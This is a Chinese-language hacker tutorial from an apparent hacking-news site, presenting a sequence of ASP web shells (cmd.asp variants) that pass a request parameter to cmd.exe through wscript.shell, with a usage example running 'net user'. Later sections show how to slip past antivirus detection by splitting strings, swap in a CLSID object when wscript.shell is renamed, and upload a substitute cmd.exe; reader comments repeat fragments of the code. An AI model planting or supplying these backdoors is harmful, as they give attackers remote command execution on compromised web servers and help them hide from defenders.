关于asp、php,jps一句话木马--中国菜刀使用

关于asp、php,jps一句话木马--中国菜刀使用

黑客教程访客2021-10-12 9:39:008945A+A-

  工具下载地址:http://pan.baidu.com/s/1o6jxAgq

  这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。

  第一个,来看zzzeva免fso的cmd.asp

  代码如下:<form method="post">

  <input type=text name="cmd" size=60>

  <input type=submit value="run"></form>

  <textarea readonly cols=80 rows=20>

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request.form("cmd")).stdout.readall%>

  </textarea>

  是不是觉得有点长了?在黑客注入时写有点不好写。那来改一下。

  第二个,更改zzzeva免fso的cmd.asp

  代码如下:

  <textarea readonly cols=80 rows=20>

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("cmd")).stdout.readall%>

  用法是xx.asp?cmd=net user

  这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个

  第三个,缩短的cmd.asp

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("cmd")).stdout.readall%>

  这里用了response.write,变量用了cmd。为什么不更短呢?

  第四个,更短的cmd.asp

  <%=server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  好像这就是最短的了。除了短,我们还要在别的地方下功夫。

  第五个,wscript.shell被改名怎么办?

  代码:

  <ObjEct runat=sErvEr iD=kk scOpE=pagE

  classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>

  <%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

  当然,classid值在不同系统下有所不同。这个要自行更改

  第六个,被一些杀asp木马的软件检测出来怎么办?

  把变量拆开呀。代码:

  <%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  或

  <%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  这里代码引号里的东东都可以随便拆的,像还可以拆成

  <%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c

  "&request("c")).stdout.readall%>

  第7个,cmd.exe不让调用怎么办?

  这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

  <%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c

  "&request("c")).stdout.readall%>

    文章来源:http://9738526.blog.51cto.com/9728526/1589937

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 纵遇劣戏2022-05-29 13:46:42
  • 那来第三个  第三个,缩短的cmd.asp  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c  "&
  • 忿咬寂星2022-05-29 17:42:44
  • =server.createobject("wscript.shell").exec("cmd.exe /c  "&request("c")).stdout.readall%>  好像这就是最短的了。除了短,我们还要
  • 嘻友叙詓2022-05-29 14:05:25
  • <%response.write server.createobject("wscript.shell").exec("cmd.exe /c  "&request("cmd")).stdout.readal
  • 假欢酷腻2022-05-29 11:48:46
  • 这个要自行更改  第六个,被一些杀asp木马的软件检测出来怎么办?  把变量拆开呀。代码:  <%=server.createobject("ws"+"cript.
  • 辙弃半枫2022-05-29 17:17:16
  •   工具下载地址:http://pan.baidu.com/s/1o6jxAgq  这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理